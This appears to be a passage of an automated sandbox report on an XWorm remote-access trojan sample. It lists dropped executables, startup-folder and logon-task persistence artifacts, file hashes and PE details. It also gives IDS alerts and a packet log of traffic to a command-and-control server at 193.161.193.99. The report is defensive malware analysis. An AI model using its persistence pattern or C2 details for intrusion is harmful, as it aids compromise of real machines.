Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 18 05:35:14 2024, mtime=Thu Jul 18 05:35:14 2024, atime=Thu Jul 18 05:35:14 2024, length=479744, window=hide
Category:	dropped
Size (bytes):	763
Entropy (8bit):	5.084402366748371
Encrypted:	false
SSDEEP:	12:87hy124c0YCh0lZY//C1WeLAHdjAHANHk4bdmV:87hypcRZSKz8ZAHD4xm
MD5:	A7B9FF1C13BD9F8B734CD3CDB141C43F
SHA1:	60C2534A0628503493D1780308B349766970367D
SHA-256:	9BC10E26800E0632E39E2D255327B4352CCC462E2176757133AD0F38E4E07D4C
SHA-512:	6D58DF49997055409D23AE6E4638328F285A3EAC7423C467AE3279FDD71A75F33D34EA91F3780448D9D874F36BD3FFEA55C80283E88113CB5B6110BDEDB3A024
Malicious:	false
Preview:	L..................F.... .........................R......................v.:..DG..Yr?.D..U..k0.&...&.........5q....wP.....M..........t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Xa4...........................c..A.p.p.D.a.t.a...B.V.1......Xe4..Roaming.@......EW)N.Xe4..........................B...R.o.a.m.i.n.g.....b.2..R...Xh4 .XClient.exe.H.......Xh4.Xh4....l.....................HZ..X.C.l.i.e.n.t...e.x.e.......X...............-.......W...........R..P.....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......536720...........hT..CrF.f4... .y!..jc...+...E...hT..CrF.f4... .y!..jc...+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	479744
Entropy (8bit):	7.957169115629821
Encrypted:	false
SSDEEP:	12288:DiuaKWgPg8r0wTKu6TlzRuCvPeIXSeXq:2ngo8r0mecKFX
MD5:	7FDA9F799B84A7ED802F7127869D5E81
SHA1:	55137AA833EE1653F52378599AAD376073264499
SHA-256:	96C861FCA93E9209ACB17B95B4253F3C26F483AD7DD9EEBE15DA3067299EF1AC
SHA-512:	E8A8CEC97A5D73A125CC6C2B05266B28CD339CE81DF5C43B3990D70D4C86A281D97A5E1CD09B14D8C7594B32E5559CE32ED5EBE69E31F87E24B2FCD27EABD089
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..f..............0.."..........j@... ...`....@.. ....................................@..................................@..O....`.............................................................................. ............... ..H............text...p ... ...".................. ..`.rsrc.......`...,...$..............@..@.reloc...............P..............@..B................L@......H.......HT..H)......8....}..............................................&.(.........0............{.....+..&...}.......0............{.....+..&...}.......0............{.....+..&...}.......0...........r...p.+..:..o....(....&...0............{.....+..&...}.......0..8........r...p.(.......(....r!..p.o.......r3..p(....(....(....&..(........}......}......}.......}....B.(........}.....0............{.....+..&...}.......0...........r7..p.+..Z......(.........}....^..}..

C:\Users\user\AppData\Roaming\pNYyTm.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	479744
Entropy (8bit):	7.957169115629821
Encrypted:	false
SSDEEP:	12288:DiuaKWgPg8r0wTKu6TlzRuCvPeIXSeXq:2ngo8r0mecKFX
MD5:	7FDA9F799B84A7ED802F7127869D5E81
SHA1:	55137AA833EE1653F52378599AAD376073264499
SHA-256:	96C861FCA93E9209ACB17B95B4253F3C26F483AD7DD9EEBE15DA3067299EF1AC
SHA-512:	E8A8CEC97A5D73A125CC6C2B05266B28CD339CE81DF5C43B3990D70D4C86A281D97A5E1CD09B14D8C7594B32E5559CE32ED5EBE69E31F87E24B2FCD27EABD089
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..f..............0.."..........j@... ...`....@.. ....................................@..................................@..O....`.............................................................................. ............... ..H............text...p ... ...".................. ..`.rsrc.......`...,...$..............@..@.reloc...............P..............@..B................L@......H.......HT..H)......8....}..............................................&.(.........0............{.....+..&...}.......0............{.....+..&...}.......0............{.....+..&...}.......0...........r...p.+..:..o....(....&...0............{.....+..&...}.......0..8........r...p.(.......(....r!..p.o.......r3..p(....(....(....&..(........}......}......}.......}....B.(........}.....0............{.....+..&...}.......0...........r7..p.+..Z......(.........}....^..}..

C:\Users\user\AppData\Roaming\pNYyTm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.957169115629821
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
File size:	479'744 bytes
MD5:	7fda9f799b84a7ed802f7127869d5e81
SHA1:	55137aa833ee1653f52378599aad376073264499
SHA256:	96c861fca93e9209acb17b95b4253f3c26f483ad7dd9eebe15da3067299ef1ac
SHA512:	e8a8cec97a5d73a125cc6c2b05266b28cd339ce81df5c43b3990d70d4c86a281d97a5e1cd09b14d8c7594b32e5559ce32ed5ebe69e31f87e24b2fcd27eabd089
SSDEEP:	12288:DiuaKWgPg8r0wTKu6TlzRuCvPeIXSeXq:2ngo8r0mecKFX
TLSH:	A7A423737B6C6B65C8B9E3F320151765A3F131A76881F8141FEDA0C4AB37B0212D6A97
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..f..............0.."..........j@... ...`....@.. ....................................@................................

File Icon


Icon Hash:	1f73ad0b8bad6d13

Static PE Info

General

Entrypoint:	0x47406a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6698985D [Thu Jul 18 04:21:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74018	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x76000	0x2a84	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x72070	0x72200	96d1a2beaeb57a155dd514ca1eaba115	False	0.9362656592278203	data	7.966741357307765	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x76000	0x2a84	0x2c00	c711c7d920052d9718f80b5479906679	False	0.9177024147727273	data	7.5996906953881656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7a000	0xc	0x200	a47ec48214838d21c5d6dc5f9d06302b	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x760c8	0x26b6	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9978809283551968
RT_GROUP_ICON	0x78790	0x14	data	1.05
RT_VERSION	0x787b4	0x2cc	data	0.4273743016759777

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/18/24-08:39:03.973866	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	30608	49708	193.161.193.99	192.168.2.10
07/18/24-08:39:13.060374	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	30608	49708	193.161.193.99	192.168.2.10
07/18/24-08:35:28.425606	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49708	30608	192.168.2.10	193.161.193.99
07/18/24-08:39:13.061283	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49708	30608	192.168.2.10	193.161.193.99
07/18/24-08:36:45.798419	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49708	30608	192.168.2.10	193.161.193.99

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-18T08:35:28.425606+0200	TCP	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	49708	30608	192.168.2.10	193.161.193.99
2024-07-18T08:39:13.060374+0200	TCP	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	30608	49708	193.161.193.99	192.168.2.10
2024-07-18T08:39:13.061283+0200	TCP	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49708	30608	192.168.2.10	193.161.193.99
2024-07-18T08:39:03.973866+0200	TCP	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	30608	49708	193.161.193.99	192.168.2.10
2024-07-18T08:36:45.798419+0200	TCP	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	49708	30608	192.168.2.10	193.161.193.99

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 18, 2024 08:35:15.880290985 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:15.885267973 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:15.885355949 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:16.069962978 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:16.075066090 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:28.425606012 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:28.430417061 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:28.708861113 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:28.722489119 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:28.727473021 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:34.387346983 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:34.438649893 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:40.782912016 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:40.787929058 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:40.990477085 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:40.992279053 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:40.997205019 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:53.142214060 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:53.148591042 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:53.372306108 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:35:53.374793053 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:35:53.380294085 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:03.972095966 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:04.016943932 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:05.501704931 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:05.511868954 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:05.704607010 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:05.705981016 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:05.711352110 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:17.861183882 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:17.866148949 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:18.266922951 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:18.269084930 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:18.280277967 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:29.861052036 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:29.866255999 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:29.955298901 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:29.960374117 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.032923937 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:30.038467884 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.048614979 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:30.053693056 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.238886118 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.240557909 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:30.245583057 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.346591949 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.347949982 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:30.354231119 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.463597059 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.465564013 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:30.470499039 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:30.470549107 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:30.475419044 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:34.014483929 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:34.063780069 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:40.345432043 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:40.350326061 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.376565933 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:40.381469965 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.541464090 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.543330908 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:40.548336029 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.642437935 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:40.647501945 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.720388889 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:40.727360010 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.798402071 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.799921036 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:40.804972887 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.926398993 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:40.928090096 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:40.933957100 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:41.071585894 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:41.074805021 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:41.079701900 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:45.798418999 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:45.803618908 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:46.060607910 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:46.062510014 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:46.067612886 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:50.909364939 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:50.914424896 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.048479080 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:51.053801060 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.235970974 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:51.241008043 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.251549006 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:51.256556034 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.605600119 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.608131886 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:51.614000082 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.812027931 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.814393997 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:51.819576025 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.926728010 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.928234100 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:51.933144093 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:51.933208942 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:51.976183891 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:52.661360979 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:52.666302919 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:52.858891010 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:52.860591888 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:52.865708113 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:54.631956100 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:54.637459040 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:54.835522890 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:36:54.840174913 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:36:54.845506907 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:00.971096992 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:00.976013899 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:01.283301115 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:01.285038948 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:01.290184975 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:01.408166885 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:01.413130999 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:01.532862902 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:01.537894964 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:01.579863071 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:01.584774971 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:01.611028910 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:01.615974903 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:01.959796906 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:01.983375072 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:01.988265991 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:02.102751970 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:02.106664896 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:02.111493111 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:02.116502047 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:02.121396065 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:03.979470968 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:04.032695055 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:06.753385067 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:06.759002924 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:07.265952110 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:07.269012928 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:07.274771929 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:12.048520088 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:12.053605080 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:12.536979914 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:12.543629885 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:12.549521923 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.282939911 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.287950993 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.345568895 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.350482941 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.361048937 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.366760015 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.376665115 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.382083893 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.423486948 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.428601027 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.455007076 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.461585999 CEST	30608	49708	193.161.193.99	192.168.2.10
Jul 18, 2024 08:37:17.517246962 CEST	49708	30608	192.168.2.10	193.161.193.99
Jul 18, 2024 08:37:17.522192955 CEST	30608	49708	193.161.193.99	192.168.2.10
